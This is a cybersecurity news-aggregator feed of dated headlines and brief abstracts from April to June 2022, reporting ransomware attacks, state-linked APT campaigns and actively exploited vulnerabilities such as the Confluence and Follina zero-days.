An "extremely sophisticated" Chinese-speaking advanced persistent threat (APT) actor dubbed LuoYu has been observed using a malicious Windows tool called WinDealer that's delivered by means of man-on-the-side attacks. "This groundbreaking development allows the actor to modify network traffic in-transit to insert malicious payloads," Russian cybersecurity company Kaspersky said in a new report. "Such attacks are especially dangerous and devastating because they do not require any interaction with the target to lead to a successful infection." Known to be active since 2008, organizations targeted by LuoYu are predominantly foreign diplomatic organizations established in China and members of the academic community as well as financial, defense, logistics, and telecommunications companies. LuoYu's use of WinDealer was first documented by Taiwanese cybersecurity firm TeamT5 at the Japan Security Analyst Conference (JSAC) in January 2021. SThe Hacker News
June 03, 2022
Microsoft Blocks Iran-linked Lebanese Hackers Targeting Israeli Companies Full Text
Abstract
Microsoft on Thursday said it took steps to disable malicious activity stemming from abuse of OneDrive by a previously undocumented threat actor it tracks under the chemical element-themed moniker Polonium. In addition to removing the offending accounts created by the Lebanon-based activity group, the tech giant's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications created and that it notified affected organizations. "The observed activity was coordinated with other actors affiliated with Iran's Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques," MSTIC assessed with "moderate confidence." The adversarial collective is believed to have breached more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon since February 2022. Targets of interest included entities in the manufacturing, IT, transpoThe Hacker News
June 3, 2022
Microsoft blocked Polonium attacks against Israeli organizations Full Text
Abstract
Microsoft blocked an attack activity aimed at Israeli organizations attributed to a previously unknown Lebanon-based hacking group tracked as POLONIUM. Microsoft announced to have blocked a series of attacks targeting Israeli organizations that have...Security Affairs
June 3, 2022
Russia is ‘failing’ in its mission to destabilize Ukraine’s networks after a series of thwarted cyber-attacks Full Text
Abstract
Since even before its invasion of Ukraine began on February 24, 2022, Russia has conducted a series of cyberattacks against both the country’s internet infrastructure and other critical services in an attempt to destabilize Ukraine.The Daily Swig
June 02, 2022
Critical Atlassian Confluence zero-day actively used in attacks Full Text
Abstract
Hackers are actively exploiting a new Atlassian Confluence zero-day vulnerability tracked as CVE-2022-26134 to install web shells, with no fix available at this time.BleepingComputer
June 2, 2022
LockBit ransomware attack impacted production in a Mexican Foxconn plant Full Text
Abstract
LockBit ransomware gang claimed responsibility for an attack against the electronics manufacturing giant Foxconn that impacted production in Mexico The electronics manufacturing giant Foxconn confirmed that its production plant in Tijuana (Mexico)...Security Affairs
June 02, 2022
Microsoft blocks Polonium hackers from using OneDrive in attacks Full Text
Abstract
Microsoft said it blocked a Lebanon-based hacking group it tracks as Polonium from using the OneDrive cloud storage platform for data exfiltration and command and control while targeting and compromising Israelian organizations.BleepingComputer
June 02, 2022
Chinese LuoYu hackers deploy cyber-espionage malware via app updates Full Text
Abstract
A Chinese-speaking hacking group known as LuoYu is infecting victims WinDealer information stealer malware deployed by switching legitimate app updates with malicious payloads in man-on-the-side attacks.BleepingComputer
June 01, 2022
Hundreds of Elasticsearch databases targeted in ransom attacks Full Text
Abstract
A campaign targeting poorly secured Elasticsearch databases has deleted their contents and dropped ransom notes on 450 instances, demanding a payment of $620 to give them back their indexes, totaling a demand of $279,000.BleepingComputer
June 1, 2022
Hive ransomware gang hit Costa Rica public health service Full Text
Abstract
Costa Rican Social Security Fund, Costa Rica 's public health service, was hit by a Hive ransomware attack. Costa Rican Social Security Fund, Costa Rica 's public health service (aka CCCS), was hit today by a Hive ransomware attack, BleepingComputer...Security Affairs
June 1, 2022
Researchers Devise Attack Using IoT and IT to Deliver Ransomware Against OT Full Text
Abstract
Attacks against OT are more difficult to achieve, but the effect is equally more difficult to mitigate. The evolution of cyber extortion makes this more than just a possible development.Security Week
June 01, 2022
Ransomware attacks need less than four days to encrypt systems Full Text
Abstract
The duration of ransomware attacks in 2021 averaged 92.5 hours, measured from initial network access to payload deployment. In 2020, ransomware actors spent an average of 230 hours to complete their attacks and 1637.6 hours in 2019.BleepingComputer
May 31, 2022
SideWinder Hackers Launched Over a 1,000 Cyber Attacks Over the Past 2 Years Full Text
Abstract
An "aggressive" advanced persistent threat (APT) group known as SideWinder has been linked to over 1,000 new attacks since April 2020. "Some of the main characteristics of this threat actor that make it stand out among the others, are the sheer number, high frequency and persistence of their attacks and the large collection of encrypted and obfuscated malicious components used in their operations," cybersecurity firm Kaspersky said in a report that was presented at Black Hat Asia this month. SideWinder , also called Rattlesnake or T-APT-04, is said to have been active since at least 2012 with a track record of targeting military, defense, aviation, IT companies, and legal firms in Central Asian countries such as Afghanistan, Bangladesh, Nepal, and Pakistan. Kaspersky's APT trends report for Q1 2022 published late last month revealed that the threat actor is actively expanding the geography of its targets beyond its traditional victim profile to otherThe Hacker News
May 31, 2022
Experts warn of ransomware attacks against government organizations of small states Full Text
Abstract
Cyber Research Labs reported a rise in ransomware attacks in the second quarter of 2022, small states are more exposed to these attacks. Cyber Research Labs observed a rise in ransomware attacks in the second quarter of 2022, some of them with a severe...Security Affairs
May 31, 2022
Costa Rica’s public health agency hit by Hive ransomware Full Text
Abstract
All computer systems on the network of Costa Rica's public health service (known as Costa Rican Social Security Fund or CCCS) are now offline following a Hive ransomware attack that hit them this morning.BleepingComputer
May 31, 2022
Experts warn of ransomware attacks against government organizations of small states Full Text
Abstract
The experts at Cyber Research Labs warn of ransomware attacks against government organizations. They observed a total of 48 government organizations from 21 countries that were hit by 13 ransomware attacks in 2022.Security Affairs
May 30, 2022
North Orange County Community College District was hit by ransomware in January Full Text
Abstract
Cypress College and Fullerton College experienced a ransomware attack. They immediately took steps to confirm the security of their systems, including the deployment of an advanced threat protection and monitoring tool.Data Breaches
May 30, 2022
New Microsoft Office zero-day used in attacks to execute PowerShell Full Text
Abstract
Security researchers have discovered a new Microsoft Office zero-day vulnerability that is being used in attacks to execute malicious PowerShell commands via Microsoft Diagnostic Tool (MSDT) simply by opening a Word document.BleepingComputer
May 30, 2022
GoodWill Ransomware victims have to perform socially driven activities to decryption their data Full Text
Abstract
Researchers discovered a new ransomware family called GoodWill that asks victims to donate the ransom for social causes. CloudSEK’s Threat Intelligence Research team has disclosed a new ransomware strain called GoodWill, that demands...Security Affairs
May 30, 2022
Document Exploiting New Microsoft Office Zero-Day Seen in the Wild Full Text
Abstract
On May 27, a researcher who uses the online moniker “nao_sec” reported on Twitter that they had found an interesting malicious document on the VirusTotal malware scanning service.Security Week
May 29, 2022
New ‘GoodWill’ Ransomware Forces Victims to Donate Money and Clothes to the Poor Full Text
Abstract
Cybersecurity researchers have disclosed a new ransomware strain called GoodWill that compels victims into donating for social causes and provide financial assistance to people in need. "The ransomware group propagates very unusual demands in exchange for the decryption key," researchers from CloudSEK said in a report published last week. "The Robin Hood-like group claims to be interested in helping the less fortunate, rather than extorting victims for financial motivations." Written in .NET, the ransomware was first identified by the India-based cybersecurity firm in March 2022, with the infections rendering sensitive files inaccessible without decrypting them. The malware, which makes use of the AES algorithm for encryption, is also notable for sleeping for 722.45 seconds to interfere with dynamic analysis. The encryption process is followed by displaying a multiple-paged ransom note that requires the victims to carry out three socially-driven activitieThe Hacker News
May 26, 2022
Experts warn of a new malvertising campaign spreading the ChromeLoader Full Text
Abstract
Researchers warn of a new malvertising campaign spreading the ChromeLoader malware that hijacks the victims' browsers. Researchers from Red Canary observed a new malvertising campaign spreading the ChromeLoader malware that hijacks the victims' browsers. ChromeLoader...Security Affairs
May 26, 2022
Microsoft shares mitigation for Windows KrbRelayUp LPE attacks Full Text
Abstract
Microsoft has shared guidance to help admins defend their Windows enterprise environments against KrbRelayUp attacks that enable attackers to gain SYSTEM privileges on Windows systems with default configurations.BleepingComputer
May 25, 2022
Researchers Find New Malware Attacks Targeting Russian Government Entities Full Text
Abstract
An unknown advanced persistent threat (APT) group has been linked to a series of spear-phishing attacks targeting Russian government entities since the onset of the Russo-Ukrainian war in late February 2022. "The campaigns [...] are designed to implant a Remote Access Trojan (RAT) that can be used to surveil the computers it infects, and run commands on them remotely," Malwarebytes said in a technical report published Tuesday. The cybersecurity company attributed the attacks with low confidence to a Chinese hacking group, citing infrastructure overlaps between the RAT and Sakula Rat malware used by a threat actor known as Deep Panda . The attack chains, while leveraging different lures over the course of two months, all employed the same malware barring small differences in the source code. The campaign is said to have commenced around February 26, days after Russia's military invasion of Ukraine, with the emails distributing the RAT under the guise of an interacThe Hacker News
May 25, 2022
SpiceJet airline passengers stranded after ransomware attack Full Text
Abstract
Indian low-cost airline SpiceJet has informed its customers of an attempted ransomware attack that has impacted some of its systems and caused delays on flight departures today.BleepingComputer
May 24, 2022
Hackers target Russian govt with fake Windows updates pushing RATs Full Text
Abstract
Hackers are targeting Russian government agencies with phishing emails that pretend to be Windows security updates and other lures to install remote access malware.BleepingComputer
May 23, 2022
General Motors credential stuffing attack exposes car owners info Full Text
Abstract
US car manufacturer GM disclosed that it was the victim of a credential stuffing attack last month that exposed customer information and allowed hackers to redeem rewards points for gift cards.BleepingComputer
May 23, 2022
Threat Actors Target the Infosec Community with Fake PoC Exploits Full Text
Abstract
An account was found sharing a fake Proof of Concept (POC) exploit code for an RPC Runtime Library Remote Code Execution flaw (CVE-2022-26809 CVSS 9.8). The malware, disguised as a fake PoC code, was available on GitHub.Security Affairs
May 23, 2022
Russian hackers perform reconnaissance against Austria, Estonia Full Text
Abstract
In a new reconnaissance campaign, the Russian state-sponsored hacking group Turla was observed targeting the Austrian Economic Chamber, a NATO platform, and the Baltic Defense College.BleepingComputer
May 21, 2022
Asian media company Nikkei suffered a ransomware attack Full Text
Abstract
The media company Nikkei has disclosed a ransomware attack and revealed that the incident might have impacted customer data. The Japanese-based media company Nikkey is focused on the business and financial industry, it is the world's largest financial...Security Affairs
May 20, 2022
QNAP warns of a new wave of DeadBolt ransomware attacks against its NAS devices Full Text
Abstract
Taiwanese vendor QNAP warned customers of a new wave of DeadBolt ransomware attacks and urges them to install the latest updates. Taiwanese vendor QNAP is asking users to install the latest update on their NAS devices and avoid exposing them on the Internet. The...Security Affairs
May 20, 2022
The activity of the Linux XorDdos bot increased by 254% over the last six months Full Text
Abstract
Microsoft researchers have observed a spike in the activity of the Linux bot XorDdos over the last six months. XORDDoS, also known as XOR.DDoS, first appeared in the threat landscape in 2014 it is a Linux Botnet that was employed in attacks...Security Affairs
May 20, 2022
Researchers Uncover Rust Supply Chain Attack Targeting Cloud CI Pipelines Full Text
Abstract
A case of software supply chain attack has been observed in the Rust programming language's crate registry that leveraged typosquatting techniques to publish a rogue library containing malware. Cybersecurity firm SentinelOne dubbed the attack " CrateDepression ." Typosquatting attacks take place when an adversary mimics the name of a popular package on a public registry in hopes that developers will accidentally download the malicious package instead of the legitimate library. In this case, the crate in question is "rustdecimal," a typosquat of the real " rust_decimal " package that's been downloaded over 3.5 million times to date. The package was flagged earlier this month on May 3 by Askar Safin, a Moscow-based developer. According to an advisory published by the Rust maintainers, the crate is said to have been first pushed on March 25, 2022, attracting fewer than 500 downloads before it was permanently removed from the repository.The Hacker News
May 20, 2022
Hackers Exploiting VMware Horizon to Target South Korea with NukeSped Backdoor Full Text
Abstract
The North Korea-backed Lazarus Group has been observed leveraging the Log4Shell vulnerability in VMware Horizon servers to deploy the NukeSped (aka Manuscrypt) implant against targets located in its southern counterpart. "The attacker used the Log4j vulnerability on VMware Horizon products that were not applied with the security patch," AhnLab Security Emergency Response Center (ASEC) said in a new report. The intrusions are said to have been first discovered in April, although multiple threat actors , including those aligned with China and Iran , have employed the same approach to further their objectives over the past few months. NukeSped is a backdoor that can perform various malicious activities based on commands received from a remote attacker-controlled domain. Last year, Kaspersky disclosed a spear-phishing campaign aimed at stealing critical data from defense companies using a NukeSped variant called ThreatNeedle . Some of the key functions of the bacThe Hacker News
May 19, 2022
Hackers Trick Users with Fake Windows 11 Downloads to Distribute Vidar Malware Full Text
Abstract
Fraudulent domains masquerading as Microsoft's Windows 11 download portal are attempting to trick users into deploying trojanized installation files to infect systems with the Vidar information stealer malware. "The spoofed sites were created to distribute malicious ISO files which lead to a Vidar info-stealer infection on the endpoint," Zscaler said in a report. "These variants of Vidar malware fetch the C2 configuration from attacker-controlled social media channels hosted on Telegram and Mastodon network." Some of the rogue distribution vector domains, which were registered last month on April 20, consist of ms-win11[.]com, win11-serv[.]com, and win11install[.]com, and ms-teams-app[.]net. In addition, the cybersecurity firm cautioned that the threat actor behind the impersonation campaign is also leveraging backdoored versions of Adobe Photoshop and other legitimate software such as Microsoft Teams to deliver Vidar malware. The ISO file, for its part,The Hacker News
May 19, 2022
Media giant Nikkei’s Asian unit hit by ransomware attack Full Text
Abstract
Publishing giant Nikkei disclosed that the group's headquarters in Singapore was hit by a ransomware attack almost one week ago, on May 13th.BleepingComputer
May 19, 2022
Washington Local Schools hit with cyberattack Full Text
Abstract
The attack impacted the district's phones, email accounts, internet, WiFi networks, and Google Classroom. Currently, teachers do not have access to outgoing or incoming calls or emails.WTOL
May 19, 2022
New Wave of Brute-Force Attacks Target SQL Servers - Microsoft Warns Full Text
Abstract
Microsoft uncovered a malicious campaign targeting SQL servers using a malware dubbed SuspSQLUsage. Attackers leverage a built-in PowerShell binary to achieve persistence on compromised systems. However, for initial compromise, they rely on brute-force tactics. It is recommended to monitor for ... Read MoreCyware Alerts - Hacker News
May 19, 2022
QNAP alerts NAS customers of new DeadBolt ransomware attacks Full Text
Abstract
Taiwan-based network-attached storage (NAS) maker QNAP warned customers on Thursday to secure their devices against attacks pushing DeadBolt ransomware payloads.BleepingComputer
May 18, 2022
Microsoft warns of attacks targeting MSSQL servers using the tool sqlps Full Text
Abstract
Microsoft warns of brute-forcing attacks targeting Microsoft SQL Server (MSSQL) database servers exposed online. Microsoft warns of a new hacking campaign aimed at MSSQL servers, threat actors are launching brute-forcing attacks against poorly protected...Security Affairs
May 18, 2022
Hackers Gain Fileless Persistence on Targeted SQL Servers Using a Built-in Utility Full Text
Abstract
Microsoft on Tuesday warned that it recently spotted a malicious campaign targeting SQL Servers that leverages a built-in PowerShell binary to achieve persistence on compromised systems. The intrusions, which leverage brute-force attacks as an initial compromise vector, stand out for their use of the utility " sqlps.exe ," the tech giant said in a series of tweets. The ultimate goals of the campaign are unknown, as is the identity of the threat actor staging it. Microsoft is tracking the malware under the name " SuspSQLUsage ." The sqlps.exe utility, which comes by default with all versions of SQL Servers, enables an SQL Agent — a Windows service to run scheduled tasks — to run jobs using the PowerShell subsystem. "The attackers achieve fileless persistence by spawning the sqlps.exe utility, a PowerShell wrapper for running SQL-built cmdlets, to run recon commands and change the start mode of the SQL service to LocalSystem," Microsoft noted. AddiThe Hacker News
May 18, 2022
Chinese ‘Space Pirates’ are hacking Russian aerospace firms Full Text
Abstract
A previously unknown Chinese hacking group known as 'Space Pirates' targets enterprises in the Russian aerospace industry with phishing emails to install novel malware on their systems.BleepingComputer
May 18, 2022
Microsoft warns of brute-force attacks targeting MSSQL servers Full Text
Abstract
Microsoft warned of brute-forcing attacks targeting Internet-exposed and poorly secured Microsoft SQL Server (MSSQL) database servers using weak passwords.BleepingComputer
May 17, 2022
Russian Conti Ransomware Gang Threatens to Overthrow New Costa Rican Government Full Text
Abstract
The notorious Conti ransomware gang, which last month staged an attack on Costa Rican administrative systems, has threatened to "overthrow" the new government of the country. "We are determined to overthrow the government by means of a cyber attack, we have already shown you all the strength and power," the group said on its official website. "We have our insiders in your government. We are also working on gaining access to your other systems, you have no other options but to pay us." In a further attempt to increase pressure, the Russian-speaking cybercrime syndicate has raised its ransom demand to $20 million in return for a decryption key to unlock their systems. Another message posted on its dark web portal over the weekend issued a warning stating it will delete the decryption keys in a week, a move that would make it impossible for Costa Rica to recover access to the files encrypted by the ransomware. "I appeal to every resident of Costa RThe Hacker News
May 17, 2022
Hackers target Tatsu WordPress plugin in millions of attacks Full Text
Abstract
Hackers are massively exploiting a remote code execution vulnerability, CVE-2021-25094, in the Tatsu Builder plugin for WordPress, which is installed on about 100,000 websites.BleepingComputer
May 16, 2022
Watch Out! Hackers Begin Exploiting Recent Zyxel Firewalls RCE Vulnerability Full Text
Abstract
Image source: z3r00t The U.S. Cybersecurity and Infrastructure Security Agency on Monday added two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its Known Exploited Vulnerabilities Catalog , citing evidence of active exploitation. Tracked as CVE-2022-30525 , the vulnerability is rated 9.8 for severity and relates to a command injection flaw in select versions of the Zyxel firewall that could enable an unauthenticated adversary to execute arbitrary commands on the underlying operating system. Impacted devices include - USG FLEX 100, 100W, 200, 500, 700 USG20-VPN, USG20W-VPN ATP 100, 200, 500, 700, 800, and VPN series The issue, for which patches were released by the Taiwanese firm in late April (ZLD V5.30), became public knowledge on May 12 following a coordinated disclosure process with Rapid7. Source: Shadowserver Merely a day later, the Shadowserver Foundation said it began detecting exploitation attempts,The Hacker News
May 16, 2022
Nerbian RAT Spreads via Emails in Ongoing Attacks Full Text
Abstract
Nerbian RAT is impersonating the WHO and pretends to contain important information regarding COVID-19. It is currently targeting entities in Italy, Spain, and the U.K. Deploy anti-phishing solutions and email gateways to stay protected.Cyware Alerts - Hacker News
May 16, 2022
Ukraine supporters in Germany targeted with PowerShell RAT malware Full Text
Abstract
An unknown threat actor is targeting German users interested in the Ukraine crisis, infecting them with a custom PowerShell RAT (remote access trojan) and stealing their data.BleepingComputer
May 15, 2022
Hackers are exploiting critical bug in Zyxel firewalls and VPNs Full Text
Abstract
Hackers have started to exploit a recently patched critical vulnerability, tracked as CVE-2022-30525, that affects Zyxel firewall and VPN devices for businesses.BleepingComputer
May 15, 2022
Unique IceApple Attack Framework Targets Multiple Sectors Full Text
Abstract
CrowdStrike encountered a previously undocumented post-exploitation framework called IceApple deployed on Exchange servers for data exfiltration. Its long-running campaign focuses on intelligence gathering and indicates that it is a state-sponsored mission, allegedly, aligning with China-nexus, s ... Read MoreCyware Alerts - Hacker News
May 14, 2022
Pro-Russian hacktivists target Italy government websites Full Text
Abstract
Pro-Russian hacker group Killnet targeted the websites of several Italian institutions, including the senate and the National Institute of Health. A group of Pro-Russian hackers known as "Killnet" launched an attack against multiple websites of several...Security Affairs
May 13, 2022
New Saitama backdoor Targeted Official from Jordan’s Foreign Ministry Full Text
Abstract
A spear-phishing campaign targeting Jordan's foreign ministry has been observed dropping a new stealthy backdoor dubbed Saitama. Researchers from Malwarebytes and Fortinet FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat actor tracked under the moniker APT34, citing resemblances to past campaigns staged by the group. "Like many of these attacks, the email contained a malicious attachment," Fortinet researcher Fred Gutierrez said . "However, the attached threat was not a garden-variety malware. Instead, it had the capabilities and techniques usually associated with advanced persistent threats (APTs)." APT34, also known as OilRig, Helix Kitten, and Cobalt Gypsy, is known to be active since at least 2014 and has a track record of striking telecom, government, defense, oil, and financial sectors in the Middle East and North Africa (MENA) via targeted phishing attacks. Earlier this February, ESET tied the group to a long-runniThe Hacker News
May 13, 2022
Iran-linked COBALT MIRAGE group uses ransomware in its operations Full Text
Abstract
Iranian group used Bitlocker and DiskCryptor in a series of attacks targeting organizations in Israel, the US, Europe, and Australia. Researchers at Secureworks Counter Threat Unit (CTU) are investigating a series of attacks conducted by the Iran-linked...Security Affairs
May 13, 2022
Malware Campaign Targets At Least 14 German Automakers Full Text
Abstract
Researchers exposed a months-long campaign targeting German car dealerships and manufacturers to deploy a variety of info-stealing malware. Attacks were traced back to 14 targeted entities in the country. To remain protected, organizations are recommended to use a strong password, deploy anti-phish ... Read MoreCyware Alerts - Hacker News
May 12, 2022
Iranian hackers exposed in a highly targeted espionage campaign Full Text
Abstract
Threat analysts have spotted a novel attack attributed to the Iranian hacking group known as APT34 group or Oilrig, who targeted a Jordanian diplomat with custom-crafted tools.BleepingComputer
May 12, 2022
Iranian Hackers Leveraging BitLocker and DiskCryptor in Ransomware Attacks Full Text
Abstract
A ransomware group with an Iranian operational connection has been linked to a string of file-encrypting malware attacks targeting organizations in Israel, the U.S., Europe, and Australia. Cybersecurity firm Secureworks attributed the intrusions to a threat actor it tracks under the moniker Cobalt Mirage, which it said is linked to an Iranian hacking crew dubbed Cobalt Illusion (aka APT35, Charming Kitten, Newscaster, or Phosphorus). "Elements of Cobalt Mirage activity have been reported as Phosphorus and TunnelVision ," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. The threat actor is said to have conducted two different sets of intrusions, one of which relates to opportunistic ransomware attacks involving the use of legitimate tools like BitLocker and DiskCryptor for financial gain. The second set of attacks are more targeted, carried out with the primary goal of securing access and gathering intelligence, while also deplThe Hacker News
May 11, 2022
Healthcare Technology Provider Omnicell Discloses Ransomware Attack Full Text
Abstract
In its latest Form 10-Q filing with the SEC, the company noted that some of its internal systems were impacted by a ransomware attack on May 4, 2022. There is an impact on certain of the company’s products and services.Security Week
May 11, 2022
Bitter cyberspies target South Asian govts with new malware Full Text
Abstract
New activity has been observed from Bitter, an APT group focused on cyberespionage, targeting the government of Bangladesh with new malware with remote file execution capabilities.BleepingComputer
May 10, 2022
Critical F5 BIG-IP vulnerability targeted by destructive attacks Full Text
Abstract
A recently disclosed F5 BIG-IP vulnerability has been used in destructive attacks, attempting to erase a device's file system and make the server unusable.BleepingComputer
May 10, 2022
Threat actors are actively exploiting CVE-2022-1388 RCE in F5 BIG-IP Full Text
Abstract
Threat actors are exploiting critical F5 BIG-IP flaw CVE-2022-1388 to deliver malicious code, cybersecurity researchers warn. Threat actors started massively exploiting the critical remote code execution vulnerability, tracked as CVE-2022-1388,...Security Affairs
May 10, 2022
FluBot Android malware targets Finland in new SMS campaigns Full Text
Abstract
Finland's National Cyber Security Center (NCSC-FI) has issued a warning about the FluBot Android malware infections increasing due to a new campaign that relies on SMS and MMS for distribution.BleepingComputer
May 10, 2022
German automakers targeted in year-long malware campaign Full Text
Abstract
A years-long phishing campaign has targeted German companies in the automotive industry, attempting to infect their systems with password-stealing malware.BleepingComputer
May 9, 2022
CERT-UA warns of malspam attacks distributing the Jester info stealer Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) warns of attacks spreading info-stealing malware Jester Stealer. The Computer Emergency Response Team of Ukraine (CERT-UA) has detected malspam campaigns aimed at spreading an info-stealer...Security Affairs
May 09, 2022
Ukrainian CERT Warns Citizens of a New Wave of Attacks Distributing Jester Malware Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of phishing attacks that deploy an information-stealing malware called Jester Stealer on compromised systems. The mass email campaign carries the subject line "chemical attack" and contains a link to a macro-enabled Microsoft Excel file, opening which leads to computers getting infected with Jester Stealer. The attack, which requires potential victims to enable macros after opening the document, works by downloading and executing an .EXE file that is retrieved from compromised web resources, CERT-UA detailed. Jester Stealer, which was first documented by Cyble in February 2022, comes with features to steal and transmit login credentials, cookies, and credit card information along with data from passwords managers, chat messengers, email clients, crypto wallets, and gaming apps to the attackers. "The hackers get the stolen data via Telegram using statically configured proxy addresses (e.g., withThe Hacker News
May 9, 2022
Experts uncovered a new wave of attacks conducted by Mustang Panda Full Text
Abstract
China-linked Mustang Panda APT group targets entities in Asia, the European Union, Russia, and the US in a new wave of attacks. In February 2022, Cisco Talos researchers started observing China-linked cyberespionage group Mustang Panda conducting...Security Affairs
May 09, 2022
Costa Rica declares national emergency after Conti ransomware attacks Full Text
Abstract
The Costa Rican President Rodrigo Chaves has declared a national emergency following cyber attacks from Conti ransomware group. BleepingComputer also observed Conti published most of the 672 GB dump that appears to contain data belonging to the Costa Rican government agencies.BleepingComputer
May 8, 2022
Conti ransomware claims to have hacked Peru MOF – Dirección General de Inteligencia (DIGIMIN) Full Text
Abstract
Conti Ransomware gang claims to have hacked the Peru MOF - Dirección General de Inteligencia (DIGIMIN) and stolen 9.41 GB. The Conti ransomware gang added the Peru MOF - Dirección General de Inteligencia (DIGIMIN) to the list of its victims on its Tor leak...Security Affairs
May 8, 2022
US agricultural machinery manufacturer AGCO suffered a ransomware attack Full Text
Abstract
The American agricultural machinery manufacturer AGCO announced that has suffered a ransomware attack that impacted its production facilities. AGCO, one of the most important agricultural machinery manufacturers, announced that a ransomware...Security Affairs
May 6, 2022
How the thriving fraud industry within Facebook attacks independent media Full Text
Abstract
Experts investigate how stolen Facebook accounts are used as part of a well-established fraud industry inside Facebook. No eyebrows were raised in Quriums security operation center when the independent Philippine media outlet Bulatlat once again...Security Affairs
May 06, 2022
US agricultural machinery maker AGCO hit by ransomware attack Full Text
Abstract
AGCO, a leading US-based agricultural machinery producer, has announced it was hit by a ransomware attack impacting some of its production facilities.BleepingComputer
May 6, 2022
Anonymous and Ukraine IT Army continue to target Russian entities Full Text
Abstract
The Anonymous collective and the volunteer group Ukraine IT Army continues to launch cyber attacks on Russian entities. The Anonymous collective continues its cyber war on Russian businesses and government organizations. Below is the list of the most...Security Affairs
May 6, 2022
Russian Ransomware Group Claims Attack on Bulgarian Refugee Agency Full Text
Abstract
LockBit 2.0 posted a notice to the dark web portal it uses to identify and extort its victims saying it had files from the Bulgarian State Agency for Refugees under the Council of Ministers.CyberScoop
May 06, 2022
Experts Uncover New Espionage Attacks by Chinese ‘Mustang Panda’ Hackers Full Text
Abstract
The China-based threat actor known as Mustang Panda has been observed refining and retooling its tactics and malware to strike entities located in Asia, the European Union, Russia, and the U.S. "Mustang Panda is a highly motivated APT group relying primarily on the use of topical lures and social engineering to trick victims into infecting themselves," Cisco Talos said in a new report detailing the group's evolving modus operandi. The group is known to have targeted a wide range of organizations since at least 2012, with the actor primarily relying on email-based social engineering to gain initial access to drop PlugX, a backdoor predominantly deployed for long-term access. Phishing messages attributed to the campaign contain malicious lures masquerading as official European Union reports on the ongoing conflict in Ukraine or Ukrainian government reports, both of which download malware onto compromised machines. Also observed are phishing messages tailored to taThe Hacker News
May 6, 2022
Ukraine IT Army hit EGAIS portal impacting Russia’s alcohol distribution Full Text
Abstract
Ukraine IT Army launched massive DDoS attacks on the EGAIS portal that has a crucial role in Russia's alcohol distribution. The collective of hacktivists Ukraine IT Army has launched a series of massive DDoS attacks on the Unified State Automated...Security Affairs
May 04, 2022
Attackers hijack UK NHS email accounts to steal Microsoft logins Full Text
Abstract
For about half a year, work email accounts belonging to over 100 employees of the National Health System (NHS) in the U.K. were used in several phishing campaigns, some aiming to steal Microsoft logins.BleepingComputer
May 4, 2022
China-linked Winnti Hackers Perform Rare Windows Mechanism Abuse in Three-year-long Campaign Full Text
Abstract
According to researchers, the attacks have been focused on infiltrating the networks of technology and manufacturing companies in Europe, Asia, and North America, focusing on stealing sensitive proprietary information.ZDNet
May 04, 2022
Heroku forces user password resets but fails to explain why Full Text
Abstract
Salesforce-owned Heroku is performing a forced password reset on a subset of user accounts in response to last month's security incident while providing no information as to why they are doing so other than vaguely mentioning it is to further secure accounts.BleepingComputer
May 4, 2022
Transport for NSW struck by cyberattack Full Text
Abstract
Transport for NSW has confirmed its Authorised Inspection Scheme (AIS) online application was impacted by a cyber incident in early April. The AIS authorizes examiners to inspect vehicles to ensure a minimum safety standard.ZDNet
May 04, 2022
Pro-Ukraine hackers use Docker images to DDoS Russian sites Full Text
Abstract
Docker images with a download count of over 150,000 have been used to run distributed denial-of-service (DDoS) attacks against a dozen Russian and Belarusian websites managed by government, military, and news organizations.BleepingComputer
May 02, 2022
GitHub Says Recent Attack Involving Stolen OAuth Tokens Was “Highly Targeted” Full Text
Abstract
Cloud-based code hosting platform GitHub described the recent attack campaign involving the abuse of OAuth access tokens issued to Heroku and Travis-CI as "highly targeted" in nature. "This pattern of behavior suggests the attacker was only listing organizations in order to identify accounts to selectively target for listing and downloading private repositories," GitHub's Mike Hanley said in an updated post. The security incident , which it discovered on April 12, related to an unidentified attacker leveraging stolen OAuth user tokens issued to two third-party OAuth integrators, Heroku and Travis-CI, to download data from dozens of organizations, including NPM. The Microsoft-owned company said last week that it's in the process of sending a final set of notifications to GitHub customers who had either the Heroku or Travis CI OAuth app integrations authorized in their accounts. According to a detailed step-by-step analysis carried out by GitHub, thThe Hacker News
May 02, 2022
Chinese cyber-espionage group Moshen Dragon targets Asian telcos Full Text
Abstract
Researchers have identified a new cluster of malicious cyber activity tracked as Moshen Dragon, targeting telecommunication service providers in Central Asia.BleepingComputer
May 2, 2022
Rocket Kitten Targets VMware Flaws In the Wild Full Text
Abstract
Iran-linked Rocket Kitten has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems. Users of the associated VMWare products should review their VMware architecture to make sure the ... Read MoreCyware Alerts - Hacker News
May 2, 2022
Amazon Web Services Targeted by a Package Backfill Attack Full Text
Abstract
WhiteSource identified, blocked, and reported two packages that were deemed to be malicious versions of original AWS packages. WhiteSource security experts have reached out to contacts at Amazon to notify them of their findings.White Source Software
May 02, 2022
Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia Full Text
Abstract
A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022. Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with some set of the activities associated with the crew assigned the moniker Nobelium (aka UNC2452/2652). "This latest wave of spear phishing showcases APT29's enduring interests in obtaining diplomatic and foreign policy information from governments around the world," Mandiant said in a report published last week. The initial access is said to have been aided through spear-phishing emails masquerading as administrative notices, using legitimate but compromised email addresses from other diplomatic entities. These emails contain an HTML dropper attachment called ROOTSAW (aka EnvyScout ) that, when opened, triggers an infection sequence that delivers and execThe Hacker News
May 02, 2022
Car rental giant Sixt facing disruptions due to a cyberattack Full Text
Abstract
Car rental giant Sixt was hit by a weekend cyberattack causing business disruptions at customer care centers and select branchBleepingComputer
April 30, 2022
Emotet tests new attack chain in low volume campaigns Full Text
Abstract
Emotet operators are testing new attack techniques in response to Microsoft's move to disable Visual Basic for Applications (VBA) macros by default. The operators of the infamous Emotet botnet are testing new attack techniques in response to Microsoft's...Security Affairs
April 29, 2022
